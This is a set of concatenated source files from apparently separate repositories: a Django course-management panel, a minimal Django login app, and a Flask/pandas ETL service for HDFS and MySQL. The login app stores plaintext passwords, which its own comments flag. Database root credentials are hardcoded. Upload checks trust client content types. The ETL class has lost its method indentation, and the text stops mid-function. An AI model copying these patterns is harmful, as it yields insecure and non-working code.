from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from django.views.generic import CreateView, UpdateView
from .models import Account
from .forms import SignUpForm, LoginForm
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib.auth.views import LoginView
class LoginAccount(SuccessMessageMixin, LoginView):
    """Stock Django LoginView with a custom template and a flash message."""
    template_name = 'accountPanel/login.html'
    success_message = 'Welcome to your profile'
class SignUpView(SuccessMessageMixin, CreateView):
    """Account registration; on success redirects to the login page."""
    template_name = 'accountPanel/signup.html'
    success_url = reverse_lazy('login')
    form_class = SignUpForm
    success_message = "Your profile was created successfully"
class ChaneID(LoginRequiredMixin, UpdateView):
    """Lets the logged-in user edit their own student_id.

    (Class name is a 'ChangeID' typo; kept because urls.py imports it.)
    """
    model = Account
    fields = ['student_id']
    template_name = 'accountPanel/student_id.html'
    success_url = reverse_lazy('index')
    def get_object(self, queryset=None):
        # Always edit the requesting user, ignoring any pk in the URL.
        return self.request.user
def logout_account(request):
    """End the session for authenticated visitors, then go to the login page."""
    if request.user.is_authenticated:
        logout(request)
    return redirect('login')
--- FILE SEPARATOR ---
from django.db import models
from account.models import Account
class Notification(models.Model):
    """A short message addressed to one Account; deleted with its recipient."""
    title = models.CharField(max_length=128)
    text = models.TextField(max_length=512)
    person = models.ForeignKey(Account,on_delete=models.CASCADE)
    def __str__(self):
        return self.title + ' ' + self.person.get_full_name()
--- FILE SEPARATOR ---
from django.shortcuts import render
from account.models import Account
from .models import Notification
def create_notification(person: Account, title: str, text: str):
    """Persist a single Notification addressed to `person`."""
    Notification(person=person, title=title, text=text).save()
def create_notification_for_many(persons, title: str, text: str):
    """Persist one Notification per recipient in `persons`."""
    for recipient in persons:
        Notification(person=recipient, title=title, text=text).save()
--- FILE SEPARATOR ---
from django.contrib import admin
from .models import Course, CourseContent, HomeWork, Answer
# Register your models here.
# Expose all panel models in the Django admin with default ModelAdmins.
admin.site.register(Course)
admin.site.register(CourseContent)
admin.site.register(HomeWork)
admin.site.register(Answer)
--- FILE SEPARATOR ---
import csv
from django.http import HttpResponse
from .models import Answer
def download_csv(objects):
    """Build an HttpResponse containing a CSV export of Answer objects.

    The response carries attachment headers so browsers download it.
    Header row is Persian: student id, full name, submit date, score.
    """
    response = HttpResponse(content_type='text/csv')
    # force download.
    response['Content-Disposition'] = 'attachment;filename=export.csv'
    # the csv writer writes straight into the response body
    writer = csv.writer(response)
    writer.writerow(['شماره دانشجویی', 'نام و نام خانوادگی', 'تاریخ ارسال', 'نمره'])
    for obj in objects:
        writer.writerow([obj.student.student_id, obj.student.get_full_name(), str(obj.submitted_date), obj.score])
    return response
--- FILE SEPARATOR ---
from datetime import datetime
from notification.views import create_notification_for_many
from notification.models import Notification
from django.utils import timezone
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404
from .models import Course, HomeWork
class NotificationMixin():
    """Adds the requesting user's notifications to the template context."""
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['notifications'] = Notification.objects.filter(person=self.request.user).all()
        return context
class AccessMixin():
    """Restrict a course-scoped view to the course's teacher (404 otherwise)."""
    def dispatch(self, request, pk, *args, **kwargs):
        course = get_object_or_404(Course, pk=pk)
        if course.teacher != request.user:
            raise Http404
        # Fix: forward the URL arguments; super().dispatch(request) dropped
        # them, so any handler taking positional/keyword URL args would break.
        return super().dispatch(request, *args, pk=pk, **kwargs)
class AccessStudentMixin():
    """Restrict a course-scoped view to students enrolled in that course."""
    def dispatch(self, request, pk, *args, **kwargs):
        course = get_object_or_404(Course, pk=pk)
        if request.user not in course.students.all():
            raise Http404
        # Fix: forward the URL arguments instead of dropping them.
        return super().dispatch(request, *args, pk=pk, **kwargs)
class CourseValidMixin():
    """On form save, stamp the logged-in user as the course's teacher."""
    def form_valid(self, form):
        self.obj = form.save(commit=False)
        self.obj.teacher = self.request.user
        # super().form_valid re-saves the instance and redirects.
        response = super().form_valid(form)
        return response
class FormValidMixin():
    """Attach the URL's course to the saved object and notify its students."""
    def form_valid(self, form):
        course = get_object_or_404(Course, pk=self.kwargs['pk'])
        self.obj = form.save(commit=False)
        self.obj.course = course
        self.obj.save()
        # Notification title is Persian for "new homework".
        create_notification_for_many(course.students.all(), title='تمرین جدید', text=self.obj.name)
        return HttpResponseRedirect(self.obj.get_absolute_url())
class AnswerValidMixin():
    """Validate a student answer upload: must be before the deadline and a PDF."""
    def form_valid(self, form):
        homework = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
        if homework.deadline_date < timezone.now():
            # Submissions after the deadline are rejected with a 404.
            raise Http404
        file = form.cleaned_data['answer']
        if 'pdf' not in file.content_type:
            # Browser-supplied content type only — not a real PDF validation.
            raise Http404
        self.obj = form.save(commit=False)
        self.obj.submitted_date = timezone.now()
        # Any resubmission clears the previous grade.
        self.obj.score = None
        response = super().form_valid(form)
        return response
class VideoValidMixin():
    """Validate uploaded course content: only video content types are allowed."""
    def form_valid(self, form):
        video = form.cleaned_data['file']
        if 'video' not in video.content_type:
            # Browser-supplied content type only — not a real format check.
            raise Http404
        course = get_object_or_404(Course, pk=self.kwargs['pk'])
        self.obj = form.save(commit=False)
        self.obj.course = course
        return super().form_valid(form)
--- FILE SEPARATOR ---
from django.urls import reverse
from django.utils import timezone
from django.db import models
from django.utils.html import strip_tags
from account.models import Account
class Course(models.Model):
    """A taught course: one teacher Account, many enrolled student Accounts."""
    # verbose_name strings are Persian UI labels ("class title", "description").
    title = models.CharField(max_length=50, blank=False , verbose_name='عنوان کلاس')
    description = models.TextField(blank=True, verbose_name='توضیحات')
    teacher = models.ForeignKey(Account, on_delete=models.CASCADE) # TODO: set validator
    students = models.ManyToManyField(Account, related_name='%(class)s_requests_created')
    def get_absolute_url(self):
        # The teacher dashboard is the canonical page for a course.
        return reverse('course_as_teacher', kwargs={'pk': self.pk})
    def __str__(self):
        return self.title
class CourseContent(models.Model):
    """An uploaded file (e.g. lecture video) attached to a course."""
    course = models.ForeignKey(Course, on_delete=models.CASCADE)
    description = models.TextField(blank=True, verbose_name='توضیحات')
    file = models.FileField(upload_to='CourseContents', verbose_name='فایل') # TODO: need to check
    published_date = models.DateTimeField(default=timezone.now, editable=True)
    def get_absolute_url(self):
        return reverse('course_as_teacher', kwargs={'pk': self.course.pk})
    def __str__(self):
        # strip_tags guards against HTML sneaking into the description.
        return self.course.title + '٬ ' + strip_tags(self.description)
class HomeWork(models.Model):
    """A homework assignment belonging to a course, with a hard deadline."""
    course = models.ForeignKey(Course, on_delete=models.CASCADE, verbose_name='درس')
    name = models.CharField(max_length=50, blank=False, verbose_name='نام')
    description = models.TextField(blank=True, verbose_name='توضیحات')
    published_date = models.DateTimeField(auto_now_add=True)
    # Submissions after this moment are rejected by AnswerValidMixin.
    deadline_date = models.DateTimeField(blank=False, null=False, verbose_name='آخرین مهلت ارسال')
    def get_absolute_url(self):
        return reverse('course_as_teacher', kwargs={'pk': self.course.pk})
    def __str__(self):
        return self.name
class Answer(models.Model):
    """A student's submission for a homework.

    All data fields are nullable because empty placeholder rows are created
    for students who have not submitted (see submit_none_answers).
    """
    answer = models.FileField(upload_to='Answers', null=True, blank=True) # TODO: need to check
    student = models.ForeignKey(Account, on_delete=models.CASCADE)
    home_work = models.ForeignKey(HomeWork, on_delete=models.CASCADE)
    submitted_date = models.DateTimeField(null=True, blank=True)
    score = models.IntegerField(null=True, blank=True)
    def __str__(self):
        return self.student.get_full_name() + '_' + self.home_work.name
--- FILE SEPARATOR ---
from django.urls import path
from .views import index, courses, HomeworkCreate, HomeworkUpdate, HomeworkDelete,\
HomeworkAnswers, AnswerScoreUpdate, CourseAsTeacher, ContentCreate, ContentDelete, CourseAsStudnet, HomeworkView,\
AnswerUpdate, CourseCreate, CourseAddStudent, download_csv_view
# Panel routes. "course/t/..." paths are the teacher-facing views; plain
# "course/..." paths are student-facing. pk = course id, pk2 = homework or
# content id, pk3 = answer id.
urlpatterns = [
    path('', index, name='index'),
    path('courses/', courses, name='courses'),
    path('course/add/', CourseCreate.as_view(), name='course_create'),
    path('course/t/<int:pk>/students/add/', CourseAddStudent.as_view(), name='course_add_student'),
    path('course/t/<int:pk>/', CourseAsTeacher.as_view(), name='course_as_teacher'),
    path('course/t/<int:pk>/homework/add/', HomeworkCreate.as_view(), name='homework_create'),
    path('course/t/<int:pk>/homework/<int:pk2>/update', HomeworkUpdate.as_view(), name='homework_update'),
    path('course/t/<int:pk>/homework/<int:pk2>/delete', HomeworkDelete.as_view(), name='homework_delete'),
    path('course/t/<int:pk>/homework/<int:pk2>/answers', HomeworkAnswers.as_view(), name='homework_answers'),
    path('course/t/<int:pk>/homework/<int:pk2>/answers/download/', download_csv_view, name='answers_download'),
    path('course/t/<int:pk>/homework/<int:pk2>/answers/<int:pk3>/score/change', AnswerScoreUpdate.as_view(), name='homework_answers_update'),
    path('course/t/<int:pk>/content/add', ContentCreate.as_view(), name='content_create'),
    path('course/t/<int:pk>/content/<int:pk2>/delete', ContentDelete.as_view(), name='content_delete'),
    path('course/<int:pk>/', CourseAsStudnet.as_view(), name='course_as_student'),
    path('course/<int:pk>/homework/<int:pk2>/', HomeworkView.as_view(), name='homework_view'),
    path('course/<int:pk>/homework/<int:pk2>/answer/<int:pk3>/update', AnswerUpdate.as_view(), name='answer_update'),
]
--- FILE SEPARATOR ---
from django.contrib.auth.decorators import login_required
from django.http import Http404, HttpResponse
from django.urls import reverse_lazy
from django.utils import timezone
from django.views.generic import CreateView, UpdateView, DeleteView, ListView, DetailView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render, redirect, get_object_or_404
from notification.models import Notification
from .models import Course, HomeWork, Answer, CourseContent
from .mixins import FormValidMixin, AccessMixin, VideoValidMixin, AccessStudentMixin, AnswerValidMixin, CourseValidMixin,\
NotificationMixin
from .functions import download_csv
@login_required
def index(request):
    """Landing page simply forwards to the courses dashboard."""
    return redirect('courses')
@login_required
def courses(request):
    """Dashboard listing courses the user teaches and courses they attend."""
    courses_as_teacher = Course.objects.filter(teacher=request.user)
    courses_as_student = Course.objects.filter(students=request.user)
    notification = Notification.objects.filter(person=request.user).all()
    return render(request, 'panel/courses.html', context={'courses_as_teacher': courses_as_teacher,
                                                          'courses_as_student': courses_as_student,
                                                          'notifications': notification})
class CourseCreate(LoginRequiredMixin, CourseValidMixin, NotificationMixin, CreateView):
    """Create a course; CourseValidMixin stamps the requester as teacher."""
    model = Course
    fields = ['title', 'description']
    template_name = 'panel/course_create.html'
class CourseAddStudent(AccessMixin, NotificationMixin, UpdateView):
    """Teacher-only view for editing a course's enrolled-students set."""
    model = Course
    fields = ['students']
    template_name = 'panel/course_add_student.html'
    def get_success_url(self):
        return reverse_lazy('course_as_teacher', kwargs={'pk': self.kwargs['pk']})
class CourseAsStudnet(AccessStudentMixin, NotificationMixin, DetailView):
    """Student view of a course: homeworks and content.

    (Class name is a 'Student' typo; kept because urls.py imports it.)
    """
    model = Course
    template_name = 'panel/course_student.html'
    context_object_name = 'course'
    def get_object(self):
        course = Course.objects.get(pk=self.kwargs['pk'])
        return course
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Newest homework first; content in publish order.
        context['homeworks'] = HomeWork.objects.filter(course=self.object).order_by('-published_date').all()
        context['contents'] = CourseContent.objects.filter(course=self.object).order_by('published_date').all()
        return context
class HomeworkView(AccessStudentMixin, NotificationMixin, DetailView):
    """Student-facing page for one homework, including their own answer."""
    model = HomeWork
    template_name = 'panel/homework_view.html'
    context_object_name = 'homework'
    def get_object(self):
        # pk2 in the URL addresses the homework; pk is the course.
        return HomeWork.objects.get(pk=self.kwargs['pk2'])
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['course'] = get_object_or_404(Course, pk=self.kwargs['pk'])
        context['homework'] = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
        # Ensure every enrolled student has a (possibly empty) Answer row,
        # so the .get() below cannot miss for a legitimate student.
        submit_none_answers(context['homework'], context['course'])
        context['answer'] = Answer.objects.get(home_work=context['homework'], student=self.request.user)
        context['now'] = timezone.now()
        return context
class AnswerUpdate(AccessStudentMixin, AnswerValidMixin, NotificationMixin, UpdateView):
    """Student answer upload/replacement; only POST is allowed."""
    model = Answer
    fields = ['answer']
    def get(self, *args, **kwargs):
        # Fix: previously `return Http404` handed back the exception class
        # itself, which is not a valid HTTP response; raising it produces
        # the intended 404 page.
        raise Http404
    def get_success_url(self):
        return reverse_lazy('homework_view', kwargs={'pk': self.kwargs['pk'], 'pk2': self.kwargs['pk2']})
    def get_object(self):
        # pk3 addresses the Answer row being replaced.
        return Answer.objects.get(pk=self.kwargs['pk3'])
class CourseAsTeacher(AccessMixin, NotificationMixin, DetailView):
    """Teacher dashboard for a course: its homeworks and uploaded content."""
    model = Course
    template_name = 'panel/course_teacher.html'
    context_object_name = 'course'
    def get_object(self):
        course = Course.objects.get(pk=self.kwargs['pk'])
        return course
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Newest homework first; content in publish order.
        context['homeworks'] = HomeWork.objects.filter(course=self.object).order_by('-published_date').all()
        context['contents'] = CourseContent.objects.filter(course=self.object).order_by('published_date').all()
        return context
class HomeworkCreate(AccessMixin, FormValidMixin, NotificationMixin, CreateView):
    """Teacher creates a homework; FormValidMixin links it to the course."""
    model = HomeWork
    fields = ['name', 'description', 'deadline_date']
    template_name = 'panel/create_change_homework.html'
class HomeworkUpdate(AccessMixin, FormValidMixin, NotificationMixin, UpdateView):
    """Teacher edits an existing homework (addressed by pk2 in the URL)."""
    model = HomeWork
    fields = ['name', 'description', 'deadline_date']
    template_name = 'panel/create_change_homework.html'
    def get_object(self):
        return HomeWork.objects.get(pk=self.kwargs['pk2'])
class HomeworkDelete(AccessMixin, DeleteView):
    """Teacher deletes a homework; only POST is allowed."""
    model = HomeWork
    def get(self, *args, **kwargs):
        # Fix: previously `return Http404` returned the exception class
        # instead of an HTTP response; raising yields the intended 404.
        raise Http404
    def get_success_url(self):
        course_pk = self.kwargs['pk']
        return reverse_lazy('course_as_teacher', kwargs={'pk': course_pk})
    def get_object(self):
        return HomeWork.objects.get(pk=self.kwargs['pk2'])
def submit_none_answers(homework: HomeWork, course: Course):
    """Create empty Answer placeholders for enrolled students without one.

    Keeps the answers table complete so per-student lookups never miss.
    """
    answers = Answer.objects.filter(home_work=homework).order_by('-submitted_date').all()
    # Set membership is O(1) per student instead of a linear list scan.
    students_has_answer = {answer.student for answer in answers}
    for student in course.students.all():
        if student not in students_has_answer:
            answer = Answer()
            answer.student = student
            answer.home_work = homework
            answer.submitted_date = None
            answer.answer = None
            answer.save()
class HomeworkAnswers(AccessMixin, NotificationMixin, ListView):
    """Teacher view listing all answers submitted for one homework."""
    model = HomeWork
    template_name = 'panel/homework_answers.html'
    context_object_name = 'answers'
    def get_queryset(self):
        self.homework = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
        return Answer.objects.filter(home_work=self.homework).order_by('-submitted_date').all()
    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context['course'] = get_object_or_404(Course, pk=self.kwargs['pk'])
        context['homework'] = get_object_or_404(HomeWork, pk=self.kwargs['pk2'])
        # Backfill placeholder rows for students who have not submitted.
        submit_none_answers(context['homework'], context['course'])
        return context
class AnswerScoreUpdate(AccessMixin, UpdateView):
    """Teacher sets/changes the score of one answer; only POST is allowed."""
    model = Answer
    fields = ['score']
    def get(self, *args, **kwargs):
        # Fix: previously `return Http404` returned the exception class
        # instead of an HTTP response; raising yields the intended 404.
        raise Http404
    def get_success_url(self):
        return reverse_lazy('homework_answers', kwargs={'pk': self.kwargs['pk'], 'pk2': self.kwargs['pk2']})
    def get_object(self):
        return Answer.objects.get(pk=self.kwargs['pk3'])
class ContentCreate(AccessMixin, VideoValidMixin, NotificationMixin, CreateView):
    """Teacher uploads course content; VideoValidMixin enforces a video file."""
    model = CourseContent
    fields = ['description', 'file']
    template_name = 'panel/create_change_content.html'
class ContentDelete(AccessMixin, DeleteView):
    """Teacher deletes a piece of course content; only POST is allowed."""
    # Fix: model was mistakenly HomeWork while get_object returns a
    # CourseContent; align the declared model with the actual object.
    model = CourseContent
    def get(self, *args, **kwargs):
        # Fix: previously `return Http404` returned the exception class
        # instead of an HTTP response; raising yields the intended 404.
        raise Http404
    def get_success_url(self):
        course_pk = self.kwargs['pk']
        return reverse_lazy('course_as_teacher', kwargs={'pk': course_pk})
    def get_object(self):
        return CourseContent.objects.get(pk=self.kwargs['pk2'])
def download_csv_view(request, pk, pk2):
    """Serve the answers of homework `pk2` as a CSV download."""
    answers = Answer.objects.filter(home_work=pk2).all()
    # Fix: download_csv already returns an HttpResponse carrying the CSV
    # payload and attachment headers; wrapping it in a second HttpResponse
    # serialized the response object itself instead of the CSV content.
    return download_csv(answers)
|
[
"/account/forms.py",
"/account/models.py",
"/account/urls.py",
"/account/views.py",
"/notification/models.py",
"/notification/views.py",
"/panel/admin.py",
"/panel/functions.py",
"/panel/mixins.py",
"/panel/models.py",
"/panel/urls.py",
"/panel/views.py"
] |
00pd00/project2
|
from django.db import models
from django.contrib.auth.models import User
class profile(models.Model):
    """Minimal credential record keyed by email.

    NOTE(review): the password is stored in plaintext — use Django's auth
    framework (hashed passwords) instead of this model.
    """
    email=models.EmailField(max_length=20)
    password=models.CharField(max_length=20)
    def __str__(self):
        return self.email
--- FILE SEPARATOR ---
from django.shortcuts import render
from .models import profile
from django.shortcuts import render , HttpResponseRedirect ,redirect,HttpResponse
from django.contrib.auth.models import User , auth
from django.db.models import Exists
from django.contrib.auth.decorators import login_required
def register(request):
    """Handle signup form POSTs; renders the signup page (with all profiles) otherwise.

    NOTE(review): passwords are stored in plaintext via the `profile` model
    and duplicate-email handling only prints to the server console — this
    should use Django's auth User with hashed passwords and user-facing
    messages.
    """
    if request.method=="POST":
        email=request.POST['email']
        password=request.POST['password1']
        password1=request.POST['password2']
        if password == password1:
            if profile.objects.filter(email=email).exists():
                # Duplicate email: falls through to re-render the form below.
                print("email already used")
            else:
                var=profile(email=email,password=password)
                print("user created")
                var.save()
                return render(request,"login.html")
        else:
            print("password doesnt match")
            return redirect("register")
    obj1=profile.objects.all()
    return render(request,"register.html",{'data1':obj1})
def login(request):
    """Validate the posted email/password against `profile` rows.

    On success stores the email in the session and redirects to the index;
    on any failure redirects to '/'. GET renders the login form.

    NOTE(review): this compares plaintext passwords — migrate to Django's
    auth framework.
    """
    if request.method == 'POST':
        email1 = request.POST['email']
        password = request.POST['password']
        # Fix: the original looped over the queryset and referenced the loop
        # variables afterwards, raising NameError when no profile matched;
        # it also had an unreachable print after the success redirect.
        match = profile.objects.filter(email=email1).first()
        if match is None:
            print("email does not exist")
            return redirect('/')
        if password == match.password:
            print("logged in")
            request.session['name'] = email1
            return redirect("index")
        print("password does not match")
        return redirect('/')
    else:
        return render(request, "login.html")
def index(request):
    """Render the site landing page."""
    return render(request,'index.html')
|
[
"/app2/models.py",
"/app2/views.py"
] |
00pf00/big-data-server
|
import os
import csv
import json
import time
import pandas as pd
import subprocess
import pymysql
from datetime import date
from kafka import KafkaConsumer
from flask import Blueprint, jsonify, request,Flask
from flask_socketio import SocketIO
from db.mysql import mysql
from hdfs.file import file
from etl.data import Data
from etl.data import get_tables_pandas as get_tables
from util.job import job
from util.error import get_error_resp
from util.engine import get_mysql_engine
# Filesystem location where trained models are stored.
model_path = '/home/model/'
# Kafka bootstrap brokers (in-cluster service DNS name).
kafka_servers = ['kafka-service:9092']
# NOTE(review): database credentials are hardcoded here — move them to
# environment variables or a config file before deploying.
mysql_args = {'host':'172.24.32.169', 'user':'root', 'passwd':'root', 'dbname':'BUPT_IOT'}
# if __name__ == '__main__':
#     print('mysql+pymysql://%s:%s@%s:3306/%s'%
#         (mysql_args['user'], mysql_args['passwd'], mysql_args['host'], mysql_args['dbname']))
--- FILE SEPARATOR ---
import pandas as pd
def get_tables_pandas(engine):
    """Yield {'table_name', 'columns'} dicts for every table on `engine`.

    Uses MySQL's `show tables` / `desc` statements via pandas.
    """
    listing = pd.read_sql_query('show tables', engine)
    names = [listing.iloc[row, 0] for row in range(listing.shape[0])]
    for table_name in names:
        described = pd.read_sql_query('desc %s' % table_name, engine)
        columns = [described.iloc[row, 0] for row in range(described.shape[0])]
        yield {'table_name': table_name, 'columns': columns}
class Data():
def __init__(self,
             source,
             source_engine,
             target=None,
             target_engine=None,
             transform_args=None):
    """Load `source` (table name or SQL) into a DataFrame via `source_engine`.

    `target`/`target_engine` describe where transformed data will go; the
    source engine is reused when no target engine is provided.
    `transform_args` is the default op list used by transform().
    """
    self.transform_args = transform_args
    self.source_engine = source_engine
    if target_engine is None:
        self.target_engine = source_engine
    else:
        self.target_engine = target_engine
    self.source = source
    self.target = target
    # Eagerly materialize the whole source into memory.
    self.df = pd.read_sql(self.source,
                          self.source_engine)
def filter(self, filter_args):
    """Keep only rows matching each {'column','cmp','value'} predicate.

    Relies on self.get_filter (defined outside this excerpt) to build the
    comparison callable — presumably maps 'cmp'/'value' to a boolean mask
    function; confirm against the full class.
    """
    for item in filter_args:
        func = self.get_filter(item['cmp'], item['value'])
        self.df = self.df[func(self.df[item['column']])]
def drop(self, drop_args):
# if drop_args is None:
# drop_args = self.args.get('drop', [])
self.df.drop(drop_args,
axis=1,
inplace=True)
def dropna(self, dropna_args):
# if dropna_args is None:
# dropna_args = self.args.get('dropna', [])
self.df.dropna(subset=dropna_args,
inplace=True)
def fillna(self, fillna_args):
values = {}
mean = self.df.mean()
median = self.df.median()
mode = self.df.mode().iloc[0]
# if fillna_args is None:
# fillna_args = self.args.get('fillna', [])
for item in fillna_args:
column = item['column']
if item['value'] == 'mean':
value = mean[column]
elif item['value'] == 'median':
value = median[column]
elif item['value'] == 'mode':
value = mode[column]
else:
value = item['value']
values[column] = value
self.df.fillna(values,
inplace=True)
def split(self, split_args):
for item in split_args:
tmp = self.df[item['source_column']].str.split(item['split_flag'], expand=True)
rename = {i:item['source_column'] + '_split_' + str(i) for i in tmp.columns}
tmp.rename(columns=rename, inplace=True)
if item.get('drop_source_column', 0) == 1:
self.drop([item['source_column']])
self.df = self.df.join(tmp)
def merge(self, merge_args):
for item in merge_args:
new_column_name = \
'merge_' + '_'.join(item['source_columns'])
new_column_name = item.get('new_column_name', new_column_name)
func = \
self.get_merge(item['source_columns'], item['split_flag'])
self.df[new_column_name] = self.df.apply(func, axis=1)
if item.get('drop_source_columns', 0) == 1:
self.drop(item['source_columns'])
def math_func(self, math_func_args):
for item in math_func_args:
new_column_name = \
item['function'] + '_' + '_'.join(item['source_columns'])
new_column_name = item.get('new_column_name', new_column_name)
func = \
self.get_function(item['source_columns'], item['function'])
self.df[new_column_name] = self.df.apply(func, axis=1)
if item.get('drop_source_columns', 0) == 1:
self.drop(item['source_columns'])
def rename(self, raname_args):
self.df.rename(columns=raname_args, inplace=True)
def transform(self, target=None, target_engine=None, transform_args=None, save=False):
s_l = self.__len__()
if transform_args is None:
transform_args = self.transform_args
for op in transform_args:
op_type = op.get('type', '')
op_args = op.get('args', [])
if op_type == 'drop':
self.drop(op_args)
elif op_type == 'dropna':
self.dropna(op_args)
elif op_type == 'filter':
self.filter(op_args)
elif op_type == 'fillna':
self.fillna(op_args)
elif op_type == 'split':
self.split(op_args)
elif op_type == 'merge':
self.merge(op_args)
elif op_type == 'math':
self.math_func(op_args)
elif op_type == 'rename':
if op_args == []:
op_args = {}
self.rename(op_args)
if target is None:
target = self.target
if target_engine is None:
target_engine = self.target_engine
if save and target is not None and target_engine is not None:
self.save(target, target_engine)
e_l = self.__len__()
return (s_l, e_l)
def save(self, target=None, target_engine=None):
if target is None:
target = self.target
if target_engine is None:
target_engine = self.target_engine
if target is not None and target_engine is not None:
self.df.to_sql(name=target,
con=target_engine,
if_exists='append',
index=False)
def get_merge(self, columns, split_flag):
def _merge(x):
res = \
split_flag.join([str(x[item]) for item in columns])
return res
return _merge
def get_function(self, columns, func):
def _function(x):
l = len(columns)
tmp = [x[item] for item in columns]
if func == 'sum':
return sum(tmp)
if func == 'mean':
return sum(tmp)/l
if func == 'max':
return max(tmp)
if func == 'min':
return min(tmp)
return _function
def get_filter(self, cmp, value):
def _filter(x):
if cmp == '>':
return x > value
if cmp == '<':
return x < value
if cmp == '==':
return x == value
if cmp == '<=':
return x <= value
if cmp == '>=':
return x >= value
if cmp == '!=':
return x != value
if cmp == 'like':
return x.str.contains(value)
return x == x
return _filter
def __len__(self):
return len(self.df.index)
if __name__ == '__main__':
    # Ad-hoc smoke test of the Data pipeline against the dev MySQL instance.
    from sqlalchemy import create_engine
    engine = create_engine('mysql+pymysql://root:root@172.24.32.169:3306/BUPT_IOT')
    data = Data(source='mydf', source_engine=engine)
    #data.drop(['index', 'id'])
    #data.dropna(['id', 'num'])
    # Replace the loaded frame with a small in-memory fixture.
    data.df = pd.DataFrame({'hah':['109', '1-1'],
                            'test':['123-456-789', '236-456-455'],
                            '1':[908, 201],
                            '2':[None, 755],
                            '3':[574,7665]})
    data.save('test')
    # print(data.df)
    #
    # data.filter([{'column':'test', 'cmp' : 'like', 'value':'-4'},
    #              {'column': 'test', 'cmp': '==', 'value': '123-456-789'}])
    #data.filter([{'column': 'index', 'cmp': '>=', 'value': 3}])
    #data.fillna([{'column':'index', 'value':1000}, {'column':'id', 'value':'mean'}])
    # data.split([{"source_column":"hah","split_flag":"-","drop_source_column":0},
    #             {"source_column": "test", "split_flag": "-", "drop_source_column": 1}])
    # data.merge([{"source_columns":["hah", "test"],"split_flag":"-","drop_source_columns":0},
    #             {"source_columns": ["hah", "merge_hah_test"], "split_flag": "-", "drop_source_columns": 1}])
    # data.rename({'1':'362846', '3':'34564', '6':'888'})
    # data.math_func([{'function': 'mean', 'source_columns':['1','2', '3'], 'new_column_name':'ttsdffds'},
    #                 {'function': 'min', 'source_columns': ['1', '2', '3'], 'drop_source_columns':0}])
    # Run a merge -> math -> split pipeline over the fixture frame.
    data.transform(transform_args=[
        {'type':'merge','args':
            [{"source_columns":["hah", "test"],"split_flag":"-","drop_source_columns":0},
             {"source_columns": ["hah", "merge_hah_test"], "split_flag": "-", "drop_source_columns": 0}]},
        {'type':'math','args':
            [{'function': 'mean', 'source_columns': ['1', '2', '3'], 'new_column_name': 'ttsdffds'},
             {'function': 'min', 'source_columns': ['1', '2', '3'], 'drop_source_columns': 0}]},
        {'type': 'split', 'args':
            [{"source_column": "hah", "split_flag": "-", "drop_source_column": 0},
             {"source_column": "test", "split_flag": "-", "drop_source_column": 1}]}
        ])
    #print(data.save('20180831_09test'))
--- FILE SEPARATOR ---
import pyhdfs
class file():
    """Thin wrapper around pyhdfs.HdfsClient for listing and deleting paths.

    Errors are printed rather than raised; callers get None (getFiles) or a
    status dict (deleteFiles) on failure.
    """
    def __init__(self, hosts='39.104.186.210', port='9000', user_name='spark'):
        # Connects immediately; raises if the namenode is unreachable.
        self.fs = pyhdfs.HdfsClient(hosts, port, user_name)
    def getFiles(self, path, owner, group):
        """Return the FileStatus dicts under *path* matching owner and group.

        Returns None when listing fails (the error is printed, not raised).
        """
        try:
            data = []
            for x in self.fs.list_status(path):
                if x['owner'] == owner and x['group'] == group:
                    data.append(x)
            return data
        except Exception as e:
            print(e)
    def deleteFiles(self, path):
        """Delete *path* and return a status dict for both outcomes."""
        try:
            self.fs.delete(path)
            status = {"status":"操作成功!","code":"200"}
            return status
        except Exception as e:
            print(e)
            status = {"status":"操作失败!","code":"500"}
            # BUG FIX: the failure status was built but never returned,
            # so callers got None instead of the error dict.
            return status
if __name__ == '__main__':
    # Smoke test: connect with defaults and list the HDFS root.
    file = file();  # NOTE(review): rebinds the class name; stray semicolon.
    print(file.getFiles("/","spark","supergroup"))
--- FILE SEPARATOR ---
from config import *
# Flask blueprint grouping the model-management routes defined below.
model = Blueprint('model', __name__)
@model.route('/get-general-model', methods=['GET', 'POST'])
def get_general_model():
    """Return the general (tenant_id = -1) models as a JSON-ish response.

    Accepts an optional `modelId` filter from the query string (GET) or
    form data (POST). On failure, logs and returns the shared error resp.
    """
    import json  # BUG FIX: json was never imported (`from config import *` does not provide it)
    try:
        sql_select = "select * from data_model where tenant_id = -1"
        data = {}
        if request.method == 'GET':
            data = request.args
        elif request.method == 'POST':
            data = request.form
        print(data)
        if 'modelId' in data:
            # int() both validates and blocks SQL injection via modelId.
            sql_select = sql_select + " and model_id = %d" % int(data.get('modelId'))
        db = mysql(**mysql_args)
        res = {'data': []}
        for item in db.select(sql_select):
            res['data'].append({
                'model_id': item[0],
                'model_name': item[1],
                'model_desc': item[2],
                'model_input': json.loads(item[3]),
                'model_path': item[4],
            })
        print(res)
        db.close()
        # NOTE(review): jsonify(str(res)) serialises the Python repr, not
        # real JSON; kept because existing clients may depend on it.
        resp = jsonify(str(res))
        resp.headers['Access-Control-Allow-Origin'] = '*'
        return resp
    except Exception as e:
        print(e)
        return get_error_resp(e)
@model.route('/get-tenant-model', methods=['GET', 'POST'])
def get_tenant_model():
    """Return the models belonging to one tenant as a JSON-ish response.

    Requires `tenantId`; accepts an optional `modelId` filter. Parameters
    come from the query string (GET) or form data (POST).
    """
    import json  # BUG FIX: json was never imported (`from config import *` does not provide it)
    try:
        data = {}
        if request.method == 'GET':
            data = request.args
        elif request.method == 'POST':
            data = request.form
        print(data)
        assert 'tenantId' in data, 'missing parameters tenant id!'
        tenant_id = int(data['tenantId'])  # int() also blocks SQL injection
        sql_select = "select * from data_model where tenant_id = %d" % tenant_id
        if 'modelId' in data:
            sql_select = sql_select + " and model_id = %d" % int(data.get('modelId'))
        db = mysql(**mysql_args)
        res = {'data': []}
        for item in db.select(sql_select):
